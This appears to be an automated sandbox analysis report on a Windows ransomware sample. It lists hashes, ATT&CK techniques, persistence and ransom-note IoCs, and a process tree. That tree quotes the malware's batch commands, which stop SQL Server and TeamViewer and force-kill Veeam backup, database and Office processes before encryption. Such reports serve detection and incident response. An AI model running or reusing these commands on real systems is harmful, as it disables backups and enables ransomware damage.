052a57afa8493f1396d73ab451c6df0135cf674529a26f692110b6ddb91c2672

Analysis

max time kernel
150s
max time network
62s
platform
windows7_x64
resource
win7v20201028
submitted
11/01/2021, 11:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe
Size

714KB
MD5

40fc48e86837f7cf7b2ad7d776e81d94
SHA1

097775629fdb7f32370923d359bb0f17a3e6dd7d
SHA256

052a57afa8493f1396d73ab451c6df0135cf674529a26f692110b6ddb91c2672
SHA512

9e5abac1aa7ba807318263007e1123149e00397bb7f82cedda4bbbdc2280dcc6850314dfd4d8970e5fd19f9739e8577fb1a36c49dc77228a967171ceceabe315

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Executes dropped EXE 1 IoCs

pid	Process
872	s.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\MountClose.tiff	vbc.exe
File opened for modification	C:\Users\Admin\Pictures\ResolveInstall.tiff	vbc.exe
File opened for modification	C:\Users\Admin\Pictures\StopCheckpoint.tiff	vbc.exe

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 3 IoCs

pid	Process
1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe
1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe
400	Process not Found

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	vbc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdateCheck = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"	vbc.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Temporary Internet Files\Content.IE5\NXBH52U7\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Microsoft\Feeds Cache\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\History\History.IE5\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Startup\desktop.ini	vbc.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Start Menu\Programs\Maintenance\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\My Documents\My Videos\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Temporary Internet Files\Content.IE5\M1AZJ0WQ\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Temporary Internet Files\Content.IE5\F6QQJELO\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Microsoft\Windows Mail\Stationery\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Documents\My Pictures\Sample Pictures\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Microsoft\Feeds Cache\RKGIF8TT\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Microsoft\Feeds Cache\8DDKLDOL\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Desktop\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Start Menu\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Start Menu\Programs\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\My Documents\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\My Documents\My Pictures\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default User\Start Menu\Programs\Accessories\System Tools\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Default\Start Menu\Programs\Accessories\System Tools\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Temporary Internet Files\Content.IE5\D08RECS3\desktop.ini	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Start Menu\Programs\Accessories\System Tools\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Default User\Start Menu\Programs\Maintenance\Desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default\SendTo\Desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Games\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Documents\My Videos\Sample Videos\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default\Start Menu\Programs\Maintenance\Desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Administrative Tools\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	vbc.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3825035466-2522850611-591511364-1000\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Maintenance\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\History\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Accessories\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	vbc.exe
File opened for modification	C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Start Menu\Programs\Maintenance\Desktop.ini	vbc.exe
File opened for modification	C:\Users\All Users\Application Data\Start Menu\Programs\Accessories\System Tools\Desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Recent\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\My Documents\My Music\desktop.ini	vbc.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\desktop.ini	vbc.exe
File opened for modification	C:\Users\Public\Documents\My Music\desktop.ini	vbc.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	vbc.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1636 set thread context of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\.A8D68E42E88BFDF0D21E	vbc.exe
File created	C:\Program Files (x86)\Windows Media Player\Skins\HOW TO BACK YOUR FILES.txt	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Stationery\1033\SEAMARBL.JPG	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7FR.DLL	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\.A8D68E42E88BFDF0D21E	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21330_.GIF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSOUTL.OLB	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RSPMECH.POC	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\TAB_ON.GIF	vbc.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HOW TO BACK YOUR FILES.txt	vbc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\.A8D68E42E88BFDF0D21E	vbc.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.ComponentModel.DataAnnotations.dll	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Contacts.accdt	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\SCNPST32.DLL	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIconsMask.bmp	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21365_.GIF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BDRTKFUL.POC	vbc.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\HOW TO BACK YOUR FILES.txt	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0102002.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105386.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02424_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02067_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00127_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml	vbc.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\HOW TO BACK YOUR FILES.txt	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00524_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232393.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.VisualC.STLCLR.dll	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ENGLISH.LNG	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_K_COL.HXK	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Elemental.eftx	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Generic.css	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG	vbc.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCARD.DPV	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\.A8D68E42E88BFDF0D21E	vbc.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\HOW TO BACK YOUR FILES.txt	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\.A8D68E42E88BFDF0D21E	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageScript.js	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49B.GIF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Aero.dll	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21301_.GIF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\WidescreenPresentation.potx	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00439_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00121_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0293832.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01842_.GIF	vbc.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\.A8D68E42E88BFDF0D21E	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\.A8D68E42E88BFDF0D21E	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePage.gif	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF	vbc.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\Icons\.A8D68E42E88BFDF0D21E	vbc.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ids.txt	vbc.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
3028	net.exe
2672	net.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
2712	taskkill.exe
2832	taskkill.exe
996	taskkill.exe
2492	taskkill.exe
2404	taskkill.exe
2272	taskkill.exe
1640	taskkill.exe
2380	taskkill.exe
2788	Process not Found
1724	Process not Found
2292	Process not Found
2936	taskkill.exe
2148	Process not Found
2588	Process not Found
2748	taskkill.exe
1348	taskkill.exe
2404	taskkill.exe
2936	taskkill.exe
2664	taskkill.exe
1216	Process not Found
2852	Process not Found
1788	taskkill.exe
2024	taskkill.exe
2468	taskkill.exe
3060	taskkill.exe
1100	Process not Found
2236	taskkill.exe
3000	taskkill.exe
2284	taskkill.exe
2312	taskkill.exe
2480	Process not Found
3004	Process not Found
2864	taskkill.exe
956	Process not Found
2848	Process not Found
2276	taskkill.exe
1216	taskkill.exe
2632	taskkill.exe
1080	Process not Found
1200	Process not Found
2248	taskkill.exe
2676	taskkill.exe
2244	Process not Found
1012	Process not Found
2724	Process not Found
2844	Process not Found
1584	taskkill.exe
1084	taskkill.exe
524	taskkill.exe
1200	taskkill.exe
936	Process not Found
2956	Process not Found
1620	Process not Found
1652	Process not Found
2620	taskkill.exe
1964	taskkill.exe
2116	taskkill.exe
836	Process not Found
2828	taskkill.exe
2808	taskkill.exe
2308	Process not Found
2792	Process not Found
1788	Process not Found
400	taskkill.exe

Runs net.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1804	vbc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe
Token: SeBackupPrivilege	1804	vbc.exe
Token: SeRestorePrivilege	1804	vbc.exe
Token: SeManageVolumePrivilege	1804	vbc.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1936	sc.exe
Token: SeDebugPrivilege	1832	net.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	2536	net1.exe
Token: SeDebugPrivilege	2656	sc.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	2828	Process not Found
Token: SeDebugPrivilege	3028	Process not Found
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	2988	Process not Found
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	2084	net.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	2064	Process not Found
Token: SeDebugPrivilege	2228	net.exe
Token: SeDebugPrivilege	3000	Process not Found
Token: SeDebugPrivilege	2864	Process not Found
Token: SeDebugPrivilege	400	Process not Found
Token: SeDebugPrivilege	1664	Process not Found
Token: SeDebugPrivilege	2416	Process not Found
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeDebugPrivilege	2532	Process not Found
Token: SeDebugPrivilege	2060	Process not Found
Token: SeDebugPrivilege	2376	Process not Found
Token: SeDebugPrivilege	340	Process not Found
Token: SeDebugPrivilege	2848	Process not Found
Token: SeDebugPrivilege	2516	Process not Found
Token: SeDebugPrivilege	1828	Process not Found
Token: SeDebugPrivilege	1788	Process not Found
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	2936	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2396	Process not Found
Token: SeDebugPrivilege	2748	Process not Found
Token: SeDebugPrivilege	2864	Process not Found
Token: SeDebugPrivilege	2276	Process not Found
Token: SeDebugPrivilege	2728	Process not Found
Token: SeDebugPrivilege	2432	Process not Found
Token: SeDebugPrivilege	2016	Process not Found
Token: SeDebugPrivilege	2832	Process not Found
Token: SeDebugPrivilege	2584	Process not Found
Token: SeDebugPrivilege	2848	Process not Found
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	3000	Process not Found
Token: SeDebugPrivilege	752	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	2916	Process not Found
Token: SeDebugPrivilege	3020	Process not Found
Token: SeDebugPrivilege	308	taskkill.exe
Token: SeDebugPrivilege	2248	Process not Found
Token: SeDebugPrivilege	2960	Process not Found
Token: SeDebugPrivilege	2236	Process not Found
Token: SeDebugPrivilege	2440	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 872	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	29
PID 1636 wrote to memory of 872	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	29
PID 1636 wrote to memory of 872	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	29
PID 1636 wrote to memory of 872	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	29
PID 872 wrote to memory of 340	872	s.exe	32
PID 872 wrote to memory of 340	872	s.exe	32
PID 872 wrote to memory of 340	872	s.exe	32
PID 340 wrote to memory of 440	340	cmd.exe	33
PID 340 wrote to memory of 440	340	cmd.exe	33
PID 340 wrote to memory of 440	340	cmd.exe	33
PID 340 wrote to memory of 572	340	cmd.exe	34
PID 340 wrote to memory of 572	340	cmd.exe	34
PID 340 wrote to memory of 572	340	cmd.exe	34
PID 340 wrote to memory of 1476	340	taskkill.exe	36
PID 340 wrote to memory of 1476	340	taskkill.exe	36
PID 340 wrote to memory of 1476	340	taskkill.exe	36
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 1636 wrote to memory of 1804	1636	SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe	31
PID 340 wrote to memory of 952	340	taskkill.exe	38
PID 340 wrote to memory of 952	340	taskkill.exe	38
PID 340 wrote to memory of 952	340	taskkill.exe	38
PID 340 wrote to memory of 996	340	taskkill.exe	39
PID 340 wrote to memory of 996	340	taskkill.exe	39
PID 340 wrote to memory of 996	340	taskkill.exe	39
PID 340 wrote to memory of 1656	340	taskkill.exe	42
PID 340 wrote to memory of 1656	340	taskkill.exe	42
PID 340 wrote to memory of 1656	340	taskkill.exe	42
PID 1476 wrote to memory of 308	1476	cmd.exe	651
PID 1476 wrote to memory of 308	1476	cmd.exe	651
PID 1476 wrote to memory of 308	1476	cmd.exe	651
PID 572 wrote to memory of 1936	572	cmd.exe	563
PID 572 wrote to memory of 1936	572	cmd.exe	563
PID 572 wrote to memory of 1936	572	cmd.exe	563
PID 340 wrote to memory of 1396	340	net1.exe	46
PID 340 wrote to memory of 1396	340	net1.exe	46
PID 340 wrote to memory of 1396	340	net1.exe	46
PID 308 wrote to memory of 1560	308	taskkill.exe	680
PID 308 wrote to memory of 1560	308	taskkill.exe	680
PID 308 wrote to memory of 1560	308	taskkill.exe	680
PID 340 wrote to memory of 1300	340	net1.exe	47
PID 340 wrote to memory of 1300	340	net1.exe	47
PID 340 wrote to memory of 1300	340	net1.exe	47
PID 952 wrote to memory of 1288	952	cmd.exe	702
PID 952 wrote to memory of 1288	952	cmd.exe	702
PID 952 wrote to memory of 1288	952	cmd.exe	702
PID 340 wrote to memory of 1248	340	net1.exe	375
PID 340 wrote to memory of 1248	340	net1.exe	375
PID 340 wrote to memory of 1248	340	net1.exe	375
PID 996 wrote to memory of 1728	996	cmd.exe	48
PID 996 wrote to memory of 1728	996	cmd.exe	48
PID 996 wrote to memory of 1728	996	cmd.exe	48
PID 1656 wrote to memory of 1184	1656	cmd.exe	673
PID 1656 wrote to memory of 1184	1656	cmd.exe	673
PID 1656 wrote to memory of 1184	1656	cmd.exe	673
PID 340 wrote to memory of 940	340	net1.exe	713

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.45381739.21553.497.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Users\Admin\AppData\Local\Temp\s.exe
  "C:\Users\Admin\AppData\Local\Temp\s.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:872
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E408.tmp\E409.tmp\E40A.bat C:\Users\Admin\AppData\Local\Temp\s.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:340
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b net stop MSSQLSERVER"
      4⤵
      PID:440
  - - C:\Windows\system32\cmd.exe
      cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        5⤵
        
        PID:1936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.BrokerService.exe
        5⤵
        
        PID:3028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer
        6⤵
        
        PID:2416
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        5⤵
        
        PID:2060
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.CloudService.exe
        5⤵
        
        PID:2864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.Manager.exe
        5⤵
        
        PID:2024
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Veeam.Backup.MountService.exe
        5⤵
        
        PID:2236
    - - C:\Windows\system32\taskkill.exe
        
